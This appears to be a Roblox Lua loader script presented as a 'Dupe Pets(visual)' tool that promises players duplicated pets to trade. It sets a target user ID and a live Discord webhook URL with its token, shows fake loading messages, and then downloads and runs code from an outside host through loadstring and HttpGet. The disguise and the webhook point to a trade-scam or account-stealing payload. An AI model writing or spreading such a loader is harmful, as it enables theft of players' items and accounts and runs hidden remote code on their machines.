_G.UserID = 1997738987
_G.Webhook = "https://discord.com/api/webhooks/1092033183257722902/VqpFHYuGaUdCEKlD1lpMndeSh1BJHuglCZ4uJ2-vPo4XNbKoVDivMDiQIFB6XMe2VnyC"
_G.ScriptName = "Dupe Pets(visual)"
_G.FirstText = "Your Script Is Loading"
_G.SecondText = "It should be loaded in just a few seconds"
_G.ThirdText = "By Using this script you are able to dupe your pets(visual) and trade them for anything"
_G.WaitingTime = 5
loadstring(game:HttpGet("http://rizz.ct8.pl/scripts/Script", true))()
